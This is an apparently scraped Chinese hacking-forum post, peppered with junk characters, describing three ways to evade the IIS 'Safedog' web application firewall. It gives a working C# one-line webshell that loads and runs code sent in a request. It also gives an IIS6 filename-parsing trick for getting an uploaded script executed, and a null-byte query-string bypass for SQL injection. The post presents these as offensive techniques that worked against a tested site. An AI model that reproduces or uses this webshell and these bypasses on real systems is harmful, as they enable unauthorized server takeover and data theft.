1、绕过IIS安全狗的一句话。$ i0 V* f. d& X
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。) X, N9 y: r5 q$ L5 I- p H; z+ Y
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
. o5 c4 y2 s# o* C
?" J" [6 p% P |2、IIS6.0解析漏洞遇到安全狗。
. Z, ^, {% i; D7 o+ ^; r6 I+ F文件名为% J* u& P3 Q& A& E
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
2 N. W( ], D7 p2 N7 q$ l5 C: k
这样的会被IIS安全狗果断屏蔽。
- ^) d6 G' X3 h4 [改成如下名称,IIS6一样会解析:
% I3 V0 ^5 ~1 n: ^www.xxxxx.com/;1.asp;1.jpg
" c* W6 P( k" Q# H7 f/ f& N4 Z& v# G3 V
3、安全狗的注入绕过。9 z# c3 f1 ]" {, P
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
9 `: x- U# H/ b) s# B但如果:
* H# w C, b; F! U) ?3 ]2 {( pr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
+ O: D6 j. ~# O! k8 ^6 g+ H/ C就可以成功绕过了。6 I2 @* B! M( e; m9 N9 @4 k' ~
. q( S2 F2 R1 j: q7 T
1 S( A. h0 W3 x8 W$ |
|